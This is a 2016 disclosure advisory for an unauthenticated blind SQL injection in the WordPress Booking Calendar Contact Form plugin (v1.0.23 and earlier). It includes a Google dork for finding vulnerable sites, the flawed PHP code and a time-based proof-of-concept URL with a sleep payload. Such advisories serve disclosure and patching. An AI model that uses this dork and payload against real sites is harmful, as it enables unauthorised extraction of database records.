# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: https://wordpress.dwbooster.com/
# Plugin URI: https://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox. 

==============
 Description
==============

Create a booking form with a reservation calendar or a classic contact form, connected to 
a PayPal payment button.
With the **Booking Calendar Contact Form** you can create a **classic contact form** or a 
**booking form with a reservation calendar**, connected to a PayPal payment button. The reservation 
calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates.

The **reservation calendar** is an optional item, so it can be disabled to create a **general 
purpose contact form**.

There are two types of bookings available in the calendar configuration: full day bookings or 
partial day bookings. With full day bookings the whole day is blocked / reserved while in partial 
day bookings the start and end dates are partially blocked as used for example in 
**room/hotel bookings**.

===================
 Technical details 
===================

Booking calendar plugin  is prone to a blind sql injection because fails to sanitize a 
parameter used into a sql statement. 
The function ´dex_bccf_get_option´ uses a variable called ´CP_BCCF_CALENDAR_ID´ which is not sanitized
and is used as value for the ´id´ of sql parameter.
The vulnerable function is called into many other functions, and one of those is ´dex_bccf_calendar_load2´ 
which sets the ´CP_BCCF_CALENDAR_ID´ with the following code:

""
$calid = str_replace(TDE_BCCFCAL_PREFIX, "", @$_GET["id"]);
    if (!defined('CP_BCCF_CALENDAR_ID') && $calid != '-1')
        define('CP_BCCF_CALENDAR_ID', $calid);
""

and then the function ´dex_bccf_get_option´ is called into ´dex_bccf_calendar_load2´ function:

"" ...
$option = dex_bccf_get_option('calendar_overlapped', DEX_BCCF_DEFAULT_CALENDAR_OVERLAPPED);
   ...
""

The ´dex_bccf_calendar_load2´ function is called when we request the next url:

https://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent
&dex_bccf_calendar_load2=list&id=<SQLI commands>

A malicious unauthenticated user can exploit the sql injection and obtain all records from database.

==================
 Proof of concept
==================

https://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent
&dex_bccf_calendar_load2=list&id=1%20and%20sleep(10)

==========
 CREDITS
==========

Vulnerability discovered by:
  Joaquin Ramirez Martinez [i0 security-lab]
  joaquin.ramirez.mtz.lab[at]gmail[dot]com
  https://www.facebook.com/I0-security-lab-524954460988147/
  https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


========
TIMELINE
========

2016-02-01 vulnerability discovered
2016-02-05 reported to vendor
2016-02-08 released fixed plugin v1.0.24
2016-02-08 public disclosure